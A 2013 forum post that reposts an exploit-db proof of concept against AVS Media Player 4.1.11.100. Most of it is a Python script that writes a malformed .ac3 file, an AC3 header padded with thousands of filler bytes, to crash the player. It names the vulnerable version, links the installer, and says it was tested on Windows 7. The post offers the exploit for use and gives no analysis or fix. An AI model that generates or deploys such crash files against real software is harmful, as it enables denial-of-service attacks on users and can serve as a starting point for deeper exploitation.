Matt Posted July 1, 2013 Report Posted July 1, 2013 Author : metacomSource : AVS Media Player 4.1.11.100 (.ac3) - Denial of ServiceVulnerable App : http://www.exploit-db.com/wp-content/themes/exploit/applications/44cd3f96f572b1c4288fcdbfc1aa2093-AVSMediaPlayer.exeCode : #!/usr/bin/pythonprint """ [+]Exploit Title:AVS Media Player(.ac3)Denial of Service Exploit [+]Vulnerable Product:4.1.11.100 [+]Download Product:http://www.avs4you.com/de/downloads.aspx [+]All AVS4YOU Software has problems with format .ac3 [+]Date: 29.06.2013 [+]Exploit Author: metacom [+]RST [+]Tested on: Windows 7 """buffer=("\x0B\x77\x3E\x68\x50\x40\x43\xE1\x06\xA0\xB9""\x65\xFF\x3A\xBE\x7C\xF9\xF3\xE7\xCF\x9F\x3E")junk = "\x41" * 5000bob = "\x42" * 100exploit = buffer+ junk + bobtry: rst= open("exploit.ac3",'w') rst.write(exploit) rst.close() print("\nExploit file created!\n")except: print "Error" Quote